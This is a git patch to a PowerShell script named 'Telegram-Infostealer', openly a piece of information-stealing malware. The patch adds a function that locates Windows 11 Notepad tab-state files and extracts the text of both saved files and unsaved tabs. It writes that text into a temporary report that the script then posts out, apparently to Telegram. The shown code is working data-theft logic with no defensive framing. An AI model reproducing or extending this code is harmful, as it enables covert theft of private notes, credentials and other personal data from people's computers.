From 8dd844509e5bd69ce7229afc87dfe7dfc0ac13e2 Mon Sep 17 00:00:00 2001
From: egieb <93350544+beigeworm@users.noreply.github.com>
Date: Wed, 6 Mar 2024 22:58:14 +0000
Subject: [PATCH] Update main.ps1

---
 Telegram-Infostealer/main.ps1 | 50 +++++++++++++++++++++++++++++++++++
 1 file changed, 50 insertions(+)

diff --git a/Telegram-Infostealer/main.ps1 b/Telegram-Infostealer/main.ps1
index 6aad1c2..8de1d65 100644
--- a/Telegram-Infostealer/main.ps1
+++ b/Telegram-Infostealer/main.ps1
@@ -167,6 +167,49 @@ else{
     $GPS = "LAT = $Lat LONG = $Lon"
 }
 
+function EnumNotepad{
+    $appDataDir = [Environment]::GetFolderPath('LocalApplicationData')
+    $directoryRelative = "Packages\Microsoft.WindowsNotepad_*\LocalState\TabState"
+    $matchingDirectories = Get-ChildItem -Path (Join-Path -Path $appDataDir -ChildPath 'Packages') -Filter 'Microsoft.WindowsNotepad_*' -Directory
+    foreach ($dir in $matchingDirectories) {
+        $fullPath = Join-Path -Path $dir.FullName -ChildPath 'LocalState\TabState'
+        $listOfBinFiles = Get-ChildItem -Path $fullPath -Filter *.bin
+        foreach ($fullFilePath in $listOfBinFiles) {
+            if ($fullFilePath.Name -like '*.0.bin' -or $fullFilePath.Name -like '*.1.bin') {
+                continue
+            }
+            $seperator = ("=" * 60)
+            $SMseperator = ("-" * 60)
+            $seperator | Out-File -FilePath $outpath -Append
+            $filename = $fullFilePath.Name
+            $contents = [System.IO.File]::ReadAllBytes($fullFilePath.FullName)
+            $isSavedFile = $contents[3]
+            if ($isSavedFile -eq 1) {
+                $lengthOfFilename = $contents[4]
+                $filenameEnding = 5 + $lengthOfFilename * 2
+                $originalFilename = [System.Text.Encoding]::Unicode.GetString($contents[5..($filenameEnding - 1)])
+                "Found saved file : $originalFilename" | Out-File -FilePath $outpath -Append
+                $filename | Out-File -FilePath $outpath -Append
+                $SMseperator | Out-File -FilePath $outpath -Append
+                Get-Content -Path $originalFilename -Raw | Out-File -FilePath $outpath -Append
+            } else {
+                "Found an unsaved tab!" | Out-File -FilePath $outpath -Append
+                $filename | Out-File -FilePath $outpath -Append
+                $SMseperator | Out-File -FilePath $outpath -Append
+                $filenameEnding = 0
+                $delimeterStart = [array]::IndexOf($contents, 0, $filenameEnding)
+                $delimeterEnd = [array]::IndexOf($contents, 1, $filenameEnding)
+    
+                $fileMarker = $contents[($delimeterStart + 2)..($delimeterEnd - 1)]
+                $fileMarker = -join ($fileMarker | ForEach-Object { [char]$_ })
+    
+                $originalFileContents = [System.Text.Encoding]::Unicode.GetString($contents[($delimeterEnd + 4 + $fileMarker.Length)..($contents.Length - 6)])
+                $originalFileContents | Out-File -FilePath $outpath -Append
+            }
+         "`n" | Out-File -FilePath $outpath -Append
+        }
+    }
+}
 
 $contents = "
 ===================================================
@@ -264,6 +307,13 @@ $outpath = "$env:TEMP/systeminfo.txt"
 $contents | Out-File -FilePath $outpath -Encoding ASCII -Append
 $infomessage2 | Out-File -FilePath $outpath -Encoding ASCII -Append
 
+if ($OSString -like '*11*'){
+    EnumNotepad
+}
+else{
+    "no notepad tabs (windows 10 or below)" | Out-File -FilePath $outpath -Encoding ASCII -Append
+}
+
 Post-Message
 Post-File
 sleep 2